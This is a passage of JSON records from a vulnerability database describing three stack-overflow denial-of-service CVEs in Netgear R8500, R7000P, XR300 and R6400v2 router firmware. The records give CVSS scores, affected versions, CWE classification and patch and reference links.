"db": "JVNDB",
"id": "JVNDB-2024-023088"
},
{
"db": "NVD",
"id": "CVE-2024-51004"
}
]
},
"cve": "CVE-2024-51004",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 5.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 5.1,
"id": "CNVD-2024-45308",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:S/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.1,
"id": "CVE-2024-51004",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 5.7,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2024-023088",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-51004",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "OTHER",
"id": "JVNDB-2024-023088",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2024-45308",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45308"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023088"
},
{
"db": "NVD",
"id": "CVE-2024-51004"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160 and R7000P v1.3.3.154 were discovered to multiple stack overflow vulnerabilities in the component usb_device.cgi via the cifs_user, read_access, and write_access parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted POST request. of netgear R8500 firmware and R7000P Firmware has a classic buffer overflow vulnerability.Service operation interruption (DoS) It may be in a state. NETGEAR R8500/R7000P is a wireless router from NETGEAR. The vulnerability is caused by the failure of cifs_user, read_access, and write_access in the usb_device.cgi component to properly verify the length of the input data",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-51004"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023088"
},
{
"db": "CNVD",
"id": "CNVD-2024-45308"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-51004",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023088",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2024-45308",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45308"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023088"
},
{
"db": "NVD",
"id": "CVE-2024-51004"
}
]
},
"id": "VAR-202411-1064",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45308"
}
],
"trust": 1.014781135
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45308"
}
]
},
"last_update_date": "2025-05-02T23:07:52.612000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for NETGEAR R8500/R7000P usb_device.cgi component buffer overflow vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/612656"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45308"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023088"
},
{
"db": "NVD",
"id": "CVE-2024-51004"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-51004"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_51/51.md"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45308"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023088"
},
{
"db": "NVD",
"id": "CVE-2024-51004"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2024-45308"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023088"
},
{
"db": "NVD",
"id": "CVE-2024-51004"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-45308"
},
{
"date": "2025-05-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-023088"
},
{
"date": "2024-11-05T15:15:24.383000",
"db": "NVD",
"id": "CVE-2024-51004"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-45308"
},
{
"date": "2025-05-01T03:44:00",
"db": "JVNDB",
"id": "JVNDB-2024-023088"
},
{
"date": "2025-04-30T16:30:44.230000",
"db": "NVD",
"id": "CVE-2024-51004"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "of netgear \u00a0R8500\u00a0 firmware and \u00a0R7000P\u00a0 Classic buffer overflow vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023088"
}
],
"trust": 0.8
}
}
VAR-202411-2969
Vulnerability from variot - Updated: 2025-05-02 22:44Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a stack overflow via the l2tp_user_ip parameter at l2tp.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-2969",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6400v2",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.128"
},
{
"model": "r7000p",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.154"
},
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "xr300",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.78"
},
{
"model": "r6400v2",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "xr300",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023022"
},
{
"db": "NVD",
"id": "CVE-2024-51002"
}
]
},
"cve": "CVE-2024-51002",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.1,
"id": "CVE-2024-51002",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 5.7,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2024-023022",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-51002",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "OTHER",
"id": "JVNDB-2024-023022",
"trust": 0.8,
"value": "Medium"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023022"
},
{
"db": "NVD",
"id": "CVE-2024-51002"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160, XR300 v1.0.3.78, R7000P v1.3.3.154, and R6400 v2 1.0.4.128 were discovered to contain a stack overflow via the l2tp_user_ip parameter at l2tp.cgi. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted POST request. R8500 firmware, XR300 firmware, R7000P A classic buffer overflow vulnerability exists in multiple Netgear products, including firmware.Service operation interruption (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-51002"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023022"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-51002",
"trust": 2.6
},
{
"db": "JVNDB",
"id": "JVNDB-2024-023022",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023022"
},
{
"db": "NVD",
"id": "CVE-2024-51002"
}
]
},
"id": "VAR-202411-2969",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.47773457333333336
},
"last_update_date": "2025-05-02T22:44:17.834000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023022"
},
{
"db": "NVD",
"id": "CVE-2024-51002"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_42/42.md"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-51002"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023022"
},
{
"db": "NVD",
"id": "CVE-2024-51002"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023022"
},
{
"db": "NVD",
"id": "CVE-2024-51002"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-01T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-023022"
},
{
"date": "2024-11-05T15:15:24.217000",
"db": "NVD",
"id": "CVE-2024-51002"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-05-01T01:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-023022"
},
{
"date": "2025-04-30T16:30:32.437000",
"db": "NVD",
"id": "CVE-2024-51002"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Classic buffer overflow vulnerability in multiple Netgear products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-023022"
}
],
"trust": 0.8
}
}
VAR-202411-1014
Vulnerability from variot - Updated: 2025-04-25 01:55Netgear R8500 v1.0.2.160 was discovered to contain multiple stack overflow vulnerabilities in the component wireless.cgi via the opmode, opmode_an, and opmode_an_2 parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted POST request. of netgear R8500 Firmware has a classic buffer overflow vulnerability.Service operation interruption (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the failure of the opmode, opmode_an, and opmode_an_2 parameters in the wireless.cgi component to properly verify the length of the input data
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202411-1014",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r8500",
"scope": "eq",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.160"
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": "r8500 firmware 1.0.2.160"
},
{
"model": "r8500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r8500",
"scope": "eq",
"trust": 0.6,
"vendor": "netgear",
"version": "v1.0.2.160"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45306"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022610"
},
{
"db": "NVD",
"id": "CVE-2024-51000"
}
]
},
"cve": "CVE-2024-51000",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 5.5,
"confidentialityImpact": "NONE",
"exploitabilityScore": 5.1,
"id": "CNVD-2024-45306",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:S/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"availabilityImpact": "HIGH",
"baseScore": 5.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.1,
"id": "CVE-2024-51000",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "High",
"baseScore": 5.7,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2024-022610",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"id": "CVE-2024-51000",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "OTHER",
"id": "JVNDB-2024-022610",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2024-45306",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45306"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022610"
},
{
"db": "NVD",
"id": "CVE-2024-51000"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Netgear R8500 v1.0.2.160 was discovered to contain multiple stack overflow vulnerabilities in the component wireless.cgi via the opmode, opmode_an, and opmode_an_2 parameters. These vulnerabilities allow attackers to cause a Denial of Service (DoS) via a crafted POST request. of netgear R8500 Firmware has a classic buffer overflow vulnerability.Service operation interruption (DoS) It may be in a state. NETGEAR R8500 is a wireless router from NETGEAR. The vulnerability is caused by the failure of the opmode, opmode_an, and opmode_an_2 parameters in the wireless.cgi component to properly verify the length of the input data",
"sources": [
{
"db": "NVD",
"id": "CVE-2024-51000"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022610"
},
{
"db": "CNVD",
"id": "CNVD-2024-45306"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2024-51000",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022610",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2024-45306",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45306"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022610"
},
{
"db": "NVD",
"id": "CVE-2024-51000"
}
]
},
"id": "VAR-202411-1014",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45306"
}
],
"trust": 1.1115042
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45306"
}
]
},
"last_update_date": "2025-04-25T01:55:53.383000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for NETGEAR R8500 wireless.cgi component buffer overflow vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/612646"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45306"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "Classic buffer overflow (CWE-120) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2024-022610"
},
{
"db": "NVD",
"id": "CVE-2024-51000"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://www.netgear.com/about/security/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2024-51000"
},
{
"trust": 1.0,
"url": "https://github.com/wudipjq/my_vuln/blob/main/netgear4/vuln_35/35.md"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2024-45306"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022610"
},
{
"db": "NVD",
"id": "CVE-2024-51000"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2024-45306"
},
{
"db": "JVNDB",
"id": "JVNDB-2024-022610"
},
{
"db": "NVD",
"id": "CVE-2024-51000"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-45306"
},
{
"date": "2025-04-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2024-022610"
},
{
"date": "2024-11-05T15:15:24.043000",
"db": "NVD",
"id": "CVE-2024-51000"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-11-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2024-45306"
},
{
"date": "2025-04-23T00:59:00",
"db": "JVNDB",
"id": "JVNDB-2024-022610"
},
